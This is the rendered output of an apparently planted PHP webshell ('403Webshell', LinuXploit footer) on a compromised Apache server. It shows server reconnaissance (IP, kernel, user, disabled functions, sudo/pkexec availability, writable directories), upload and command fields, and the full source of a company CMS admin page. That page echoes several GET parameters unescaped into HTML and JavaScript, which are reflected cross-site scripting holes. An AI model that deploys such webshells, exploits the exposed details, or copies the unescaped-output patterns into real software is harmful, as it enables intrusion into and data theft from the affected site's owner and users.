403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)eizo.hkosl.com/global/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)eizo.hkosl.com/global/webadmin/model_index.php
<?php
	include 'config.php';

	// Check if the user is logged in

	if ((!isSet($_SESSION['loginname'])) || ($loggin <> '1')) {
		header("Location: login.php");
		exit;
	}
	require_once("configure.php");


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	<title>Content Management System (CMS) - Powered by One Solution Limited</title>
	<link rel="stylesheet" type="text/css" href="css/style.css"/>
	<!-- Main Menu -->
	<link rel="stylesheet" type="text/css" href="css/menu.css"/>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
	<script type="text/javascript" src="js/ddaccordion.js"></script>
	<script type="text/javascript" src="js/menuddaccordion.js"></script>

	<!-- End Main Menu -->
	<script type="text/javascript">
		function DeleteRow(model_id, series_code) {
			if (confirm("Are you sure you want to delete?")) {
				window.location.href = 'model_delete.php?model_id=' + model_id +"&series_code="+series_code;
			}
		}

	</script>

</head>

<body>
<table width="1200" height="600" border="0" cellpadding="0" cellspacing="0">
	<tr>
		<td width="200" align="left" valign="top">
			<table width="200" border="0" cellpadding="0" cellspacing="0">
				<tr>
					<td height="70" align="left" valign="middle">&nbsp;</td>
				</tr>
				<tr>
					<td width="200" align="left" valign="top"><!-- Main Menu -->
						<?php require("menu.php");?><!-- End Main Menu --></td>
				</tr>
			</table>
		</td>
		<td width="1000" align="left" valign="top">
			<table width="1000" border="0" cellpadding="0" cellspacing="0">
				<tr>
					<td>
						<table width="1000" border="0" cellspacing="0" cellpadding="0">
							<tr>
								<td height="70" class="pagetitletxt">&nbsp;&nbsp;</td>
								<td width="50" align="center" class="icontxt">
									<a href="model_addform.php?region=<?php if(isset($_GET["region"])) echo $_GET["region"]?>&series_code=<?php if(isset($_GET["series_code"])) echo $_GET["series_code"]?>"><img src="images/iconNew.png" alt="Add" width="32" height="32" border="0"/><br/>&nbsp;Add&nbsp;&nbsp;
									</a></td>
							</tr>
						</table>
					</td>
				</tr>
				<tr>
					<td class="pagetitletxt">
						&nbsp;&nbsp;<b><img src="images/iconList.jpg" width="48" height="48" align="absmiddle"/> Product Model</b></td>
				</tr>
				<tr>
					<td height="25" align="left" valign="middle" class="msg"><?php if (isset($_GET["msg"])) echo $_GET['msg']; ?></td>
				</tr>

				<tr>
					<td align="left" valign="middle">
						Region: <select id="filter_region" onchange="window.location.href='model_index.php?region='+this.value+'&series_code='+$('#filter_series :selected').val();">
							<option value="" <?php if(!isset($_GET["region"])) echo "selected";?>>-Please Select-</option>

							<option value="all" <?php if(isset($_GET["region"]) && $_GET["region"] == "all") echo "selected";?>>Show All</option>
							<option value="CN" <?php if((isset($_GET["region"]) && $_GET["region"] == "CN")) echo "selected";?>>CN</option>
							<option value="HK" <?php if((isset($_GET["region"]) && $_GET["region"] == "HK")) echo "selected";?>>HK</option>
						</select>

						Product Series: <select id="filter_series" onchange="window.location.href='model_index.php?region='+$('#filter_region :selected').val()+'&series_code='+this.value" <?php if(empty($_GET["region"])) echo "disabled"; ?>>
							<?php
								if((isset($_GET["series_code"]) && $_GET["series_code"] == "all")) {
									$show_all_selected = "selected";
								}else{
									$show_all_selected = "";
								}

								echo '<option value="">-Please Select-</option>';

								echo '<option value="all" '.$show_all_selected.'>Show All</option>';

								if(isset($_GET["region"]) && $_GET["region"] == "all"){
									$sql = "SELECT * FROM series where deleted = ? group by series_code ORDER BY series_code ASC ";
									$parameter = array("0");
								}else{
									$sql = "SELECT * FROM series where deleted = ? and region = ? group by series_code ORDER BY series_code ASC ";
									$parameter = array("0", $_GET["region"]);
								}

								if (!($sth = $dbh->prepare($sql))) {
									throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
								}

								if (!$sth->execute($parameter)) {
									throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
								}

								while ($row = $sth->fetch(PDO::FETCH_ASSOC)) {
									if($row{"series_code"} == $_GET["series_code"]){
										$this_series_selected = "selected";
									}else{
										$this_series_selected = "";
									}
									echo '<option value="'.$row{"series_code"}.'" '.$this_series_selected.'>'.$row{"series_code"}.'</option>';
								}
							?>
							</select>

						<button type="button" onclick="window.location.href='model_index.php?region=all&series_code=all'"> Show All</button>

						<button type="button" onclick="window.location.href='model_index.php'"> Reset All</button>


					</td>
				</tr>

				<tr>
					<td align="left" valign="middle">
						<table width="1000" border="0" cellpadding="0" cellspacing="0">
							<tr>
								<td width="10" class="listtitletxt"></td>
								<td width="40" class="listtitletxt">Region</td>
								<td width="80" class="listtitletxt">Series Code</td>
								<td width="80" class="listtitletxt">Model Code</td>
								<td width="80" class="listtitletxt">Fixed Warranty Year</td>
								<td width="10" class="listtitletxt">Extend Warranty Months</td>
								<td width="100" class="listtitletxt">Free On-site <br>Calibration</td>
								<td width="80" class="listtitletxt">Promote Date From</td>
								<td width="100" class="listtitletxt">To</td>
								<td width="120" class="listtitletxt">Last Update</td>
								<td width="20" class="listtitletxt"></td>
								<td width="20" class="listtitletxt"></td>
							</tr>
							<form name="model_sort_update" method="post" action="model_sort_update.php" enctype="multipart/form-data">

								<?php
									/*if( (!isset($_GET["region"]) || (isset($_GET["region"]) && $_GET["region"] == "all")) && (!isset($_GET["series_code"]) || (isset($_GET["series_code"]) && $_GET["series_code"] == "all")) ) {

										$sql = "SELECT *,model.status as model_status, model.region as model_region,model.sort as model_sort FROM model model, series series where model.series_id = series.series_id and model.deleted = ? ORDER BY series.series_code ASC, model.model_code ASC ";

										$parameter = array("0");
									}else if((!isset($_GET["region"]) || (isset($_GET["region"]) && $_GET["region"] == "all")) && (isset($_GET["series_code"]) && $_GET["series_code"] != "all")){
										$sql = "SELECT *,model.status as model_status,model.region as model_region, model.sort as model_sort FROM model model, series series where model.series_id = series.series_id and series.series_code = ? and model.deleted = ? ORDER BY series.series_code ASC, model.model_code ASC ";

										$parameter = array($_GET["series_code"],"0");
									}else if((!isset($_GET["region"]) || (isset($_GET["region"]) && $_GET["region"] != "all")) && (isset($_GET["series_code"]) && $_GET["series_code"] == "all")){
										$sql = "SELECT *,model.status as model_status,model.region as model_region, model.sort as model_sort FROM model model, series series where model.series_id = series.series_id and series.region = ? and model.deleted = ? ORDER BY series.series_code ASC, model.model_code ASC ";

										$parameter = array($_GET["region"],"0");
									}else{
										$sql = "SELECT *,model.status as model_status,model.region as model_region, model.sort as model_sort FROM model model, series series where model.series_id = series.series_id and series.region = ? and series.series_code = ? and model.deleted = ? ORDER BY series.series_code ASC, model.model_code ASC ";

										$parameter = array($_GET["region"], $_GET["series_code"],"0");
									}*/

									if(isset($_GET["region"])){

										$sql = "SELECT *,model.status as model_status,model.lastupdate as model_lastupdate, model.region as model_region,model.sort as model_sort FROM model model, series series where model.series_id = series.series_id and model.deleted = ? ";
										$parameter = array();
										$parameter[] = "0";

										if($_GET["region"] == "all"){

											if(!isset($_GET["series_code"]) || (isset($_GET["series_code"]) && $_GET["series_code"] == "all")){

											}else{
												$sql .= "and series.series_code=? ";
												$parameter[] = $_GET["series_code"];

											}


										}else{
											$sql .= "and series.region=? ";
											$parameter[] = $_GET["region"];
											if(!isset($_GET["series_code"]) || (isset($_GET["series_code"]) && $_GET["series_code"] == "all")){

											}else{
												$sql .= "and series.series_code=? ";
												$parameter[] = $_GET["series_code"];

											}
										}

										$sql .= "ORDER BY series.region ASC, series.series_code ASC, model.model_code ASC ";

										if (!($sth = $dbh->prepare($sql))) {
											throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
										}

										if (!$sth->execute($parameter)) {
											throw new Exception('[' . $sth->errorCode() . ']: ' . print_r($sth->errorInfo()));
										}

										while ($row = $sth->fetch(PDO::FETCH_ASSOC)) {
											print "<tr>";
											print "<td class='listtxt' style='padding-left:5'>&nbsp;</td>";

											print "<input type='hidden' name='series_code' value='".$_GET["series_code"]."' />";

											//print "<td class='listtxt' valign='middle' align='left'><input class='sortinput' type='text' name='idarraynumber[]' value='" . $row{'model_sort'} . "' size='2' /><input type='hidden' name='idarray[]'  value='" . $row{'model_id'} . "'></td>";

											print "<td class='listtxt' style='padding-left:5'>" . $row{'model_region'} . "</td>";
											print "<td class='listtxt' style='padding-left:5'>" . $row{'series_code'} . "</td>";
											print "<td class='listtxt' style='padding-left:5'>" . $row{'model_code'} . "</td>";


											print "<td class='listtxt' style='padding-left:5'>" . $row{'fixed_warranty_year'} . "</td>";
											print "<td class='listtxt' style='padding-left:5'>" . $row{'extend_warranty_year'} . "</td>";
											if($row{"free_mix_color"} == "1"){
												$free_mix_color = "Yes";
											}else{
												$free_mix_color = "N/A";
											}
											print "<td class='listtxt' style='padding-left:5'>" . $free_mix_color . "</td>";

											if($row{'promote_datefrom'} == "0000-00-00"){
												print "<td class='listtxt' style='padding-left:5'></td>";
											}else{
												print "<td class='listtxt' style='padding-left:5'>" . $row{'promote_datefrom'} . "</td>";
											}

											if($row{'promote_dateto'} == "0000-00-00"){
												print "<td class='listtxt' style='padding-left:5'></td>";
											}else{
												print "<td class='listtxt' style='padding-left:5'>" . $row{'promote_dateto'} . "</td>";
											}

											print "<td class='listtxt' style='padding-left:5'>" . $row{'model_lastupdate'} . "</td>";

											//Status
											/*print "<td class='listtxt' align='center'>";
											if ($row{'model_status'} == '1') // Enable
											{
												print "<a href='model_status.php?series_code=".$_GET["series_code"]."&model_id=" . $row{'model_id'} . "'>";
												print "<img src='images/tick.png' title='Enable' alt='Enable' border='0' hspace='2'></a>";
											} else // Disable
											{
												print "<a href='model_status.php?series_code=".$_GET["series_code"]."&model_id=" . $row{'model_id'} . "'>";
												print "<img src='images/cross.png' title='Disable' alt='Disable' border='0' hspace='2'></a>";
											}
											print "</td>";
	*/
											// Modify
											print "<td class='listtxt' align='center'><a href='#' onClick=\"window.location='model_modifyform.php?model_id=" . $row{'model_id'} . "&series_code=".$_GET["series_code"]."'\"><img src='images/btnModify.png' title='Modify' alt='Modify' hspace='2' border='0'></a></td>";


											// Delete
											print "<td class='listtxt' align='center'><a href='#' onClick=\"DeleteRow(" . $row{'model_id'} . ", ".$_GET["series_code"].")\"><img src='images/btnDelete.png' title='Delete' alt='Delete' hspace='2' border='0'></a></td>";
											print "</tr>";


											print "</tr>";
										}
									}
									$dbh = null;
								?>
						</table>
						<!--<input type="submit" value="Update Sort">--></form></td>
				</tr>
			</table>
		</td>
	</tr>
</table>
</body>
</html>


Youez - 2016 - github.com/yon3zu
LinuXploit